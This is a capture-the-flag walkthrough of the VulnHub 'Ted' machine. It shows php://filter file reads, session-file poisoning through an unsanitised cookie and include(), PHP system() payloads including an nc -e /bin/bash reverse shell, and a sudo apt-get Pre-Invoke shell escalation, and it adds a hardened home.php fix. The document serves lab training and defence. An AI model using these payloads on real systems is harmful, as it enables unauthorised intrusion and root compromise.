1. Download the target VM:
https://download.vulnhub.com/ted/Ted.7z
2. Extract it and open it in your VM software; set the network adapter to bridged mode.
3. Open the default port 80 in a browser.
There is a login form.
The username is admin and the password is also admin, but the password has to be submitted as an uppercase SHA hash.
After logging in, there is a file search box.
There is no SQL injection, so try a file read instead.
There is also an authenticate.php file. Read it with the php:// filter wrapper and base64-decode the result:
php://filter/read=convert.base64-encode/resource=authenticate.php
authenticate.php:
```php
<?php
session_start();
$DATABASE_HOST = 'localhost';
$DATABASE_USER = 'user';
$DATABASE_PASS = 'password';
$DATABASE_NAME = 'dbname';
// Try and connect using the info above.
$con = mysqli_connect($DATABASE_HOST, $DATABASE_USER, $DATABASE_PASS, $DATABASE_NAME);
if ( mysqli_connect_errno() ) {
    // If there is an error with the connection, stop the script and display the error.
    die ('Failed to connect to MySQL: ' . mysqli_connect_error());
}
// Now we check if the data from the login form was submitted, isset() will check if the data exists.
if ( !isset($_POST['username'], $_POST['password']) ) {
    // Could not get the data that should have been sent.
    header('Location: home.php');
}
// Prepare our SQL, preparing the SQL statement will prevent SQL injection.
if ($stmt = $con->prepare('SELECT id, password FROM accounts WHERE username = ?')) {
    // Bind parameters (s = string, i = int, b = blob, etc), in our case the username is a string so we use "s"
    $stmt->bind_param('s', $_POST['username']);
    $stmt->execute();
    // Store the result so we can check if the account exists in the database.
    $stmt->store_result();
}
if ($stmt->num_rows > 0) {
    $stmt->bind_result($id, $password);
    $stmt->fetch();
    // Account exists, now we verify the password.
    // Note: remember to use password_hash in your registration file to store the hashed passwords.
    if ($_POST['password'] == $password) {
        // Verification success! User has logged in!
        // Create sessions so we know the user is logged in, they basically act like cookies but remember the data on the server.
        session_regenerate_id();
        $_SESSION['loggedin'] = TRUE;
        $_SESSION['name'] = $_POST['username'];
        $_SESSION['id'] = $id;
        setcookie('user_pref','/',time() + (86400 * 30), "/");
        header('Location: home.php');
    } elseif ($_POST['password'] == "admin") {
        echo "<p>Password hash is not correct, make sure to hash it before submit.</p>";
        header('Location: index.php');
    } else {
        echo "<p>Password or password hash is not correct, make sure to hash it before submit.</p>";
        header('Location: index.php');
    }
} else {
    echo "<p>Username is not correct.</p>";
    header('Location: index.php');
}
$stmt->close();
?>
```
home.php:
```php
<?php
session_start();
if (!isset($_SESSION['loggedin'])) {
    header('Location: index.html');
    exit();
}
$_SESSION['user_pref'] = $_COOKIE['user_pref'];
?>
<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>Home Page</title>
    <link href="style.css" rel="stylesheet" type="text/css">
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.1/css/all.css">
</head>
<body class="loggedin">
    <nav class="navtop">
        <div>
            <h1>Simple File Browser</h1>
            <a href="logout.php">Logout</a>
        </div>
    </nav>
    <div class="content">
        <h2>Home</h2>
        <p>Welcome back, <?=$_SESSION['name'];?>!</p>
        <br>
        <div class="inner_content">
            <form method="post" action="home.php">
                <input type="text" id="search" placeholder="Search.." name="search">
                <button type="submit">Search</button>
            </form>
            <br>
            <br>
            <?php
            if (isset($_POST['search'])) {
                echo "Showing results for ".$_POST['search'].":";
                echo "<br>";
                echo "<br>";
                echo "<br>";
                echo "<br>";
                echo "<br>";
                echo "<br>";
                echo "<br>";
                echo "<br>";
            }
            include($_POST['search']);
            ?>
        </div>
        <a href="cookie.php">Cookies Policy</a>
        <br>
        <br>
        <br>
        <br>
        <br>
        <br>
        <br>
        <br>
        <br>
        <br>
        <br>
        <br>
        <br>
        <br>
        <br>
        <br>
        <br>
        <br>
        <br>
        <center>avrahamcohen.ac@gmail.com</center>
    </div>
</body>
</html>
```
Note this line in home.php:
$_SESSION['user_pref'] = $_COOKIE['user_pref'];
The user_pref cookie field can therefore be used to write into the session file, which the include() above then lets us execute directly:
<?php system("uname -a") ?>
URL-encoded:
%3C?php%20system(%22uname%20-a%22)?%3E
From here a webshell can be written, or a reverse shell spawned with nc:
<?php system("nc -e /bin/bash ip 4444") ?>
URL-encoded:
%3C?php%20system(%22nc%20-e%20/bin/bash%20ip%204444%22)%20?%3E
The reverse shell connects back:
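The chain above works because home.php copies raw cookie bytes into the session file and then passes user input straight to include(). Below is a hardened replacement for those two spots, added here as an example rather than code from the challenge; the pages/ directory and the about/help page names are assumptions.

```php
<?php
// Added example: hardened include() and cookie handling for home.php.
// Not the challenge's code; the page map and pages/ directory are assumed.
session_start();
if (empty($_SESSION['loggedin'])) {
    header('Location: index.html');
    exit();
}

// 1. Do not copy raw cookie bytes into the session. Session data is written to a
//    file on disk, so anything an attacker puts in the cookie becomes includable
//    content. Accept only a closed set of known values.
const ALLOWED_PREFS = ['light', 'dark'];
$pref = $_COOKIE['user_pref'] ?? 'light';
$_SESSION['user_pref'] = in_array($pref, ALLOWED_PREFS, true) ? $pref : 'light';

// 2. Do not pass user input to include(). Look the submitted name up in a fixed
//    map and confirm the resolved path stays inside the pages directory. This
//    rejects php:// wrappers, absolute paths and '..' traversal alike.
const PAGES = [
    'about' => 'about.php',   // assumed page
    'help'  => 'help.php',    // assumed page
];

function resolve_page(string $dir, ?string $name): ?string
{
    if ($name === null || !array_key_exists($name, PAGES)) {
        return null;
    }
    $base = realpath($dir);
    $path = realpath($dir . '/' . PAGES[$name]);
    if ($base === false || $path === false || strpos($path, $base . '/') !== 0) {
        return null;
    }
    return $path;
}

$name   = $_POST['search'] ?? null;
$target = resolve_page(__DIR__ . '/pages', $name);
if ($target === null) {
    echo '<p>No such page.</p>';
} else {
    // Escape before echoing: the original reflected $_POST['search'] unescaped.
    echo 'Showing results for ' . htmlspecialchars($name, ENT_QUOTES, 'UTF-8') . ':';
    include $target;
}
```

With this in place a php://filter or session-file path submitted as search never reaches include(), and a cookie carrying PHP tags is replaced by the default value before it is stored.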
Escalate privileges with the apt command:
sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
Done.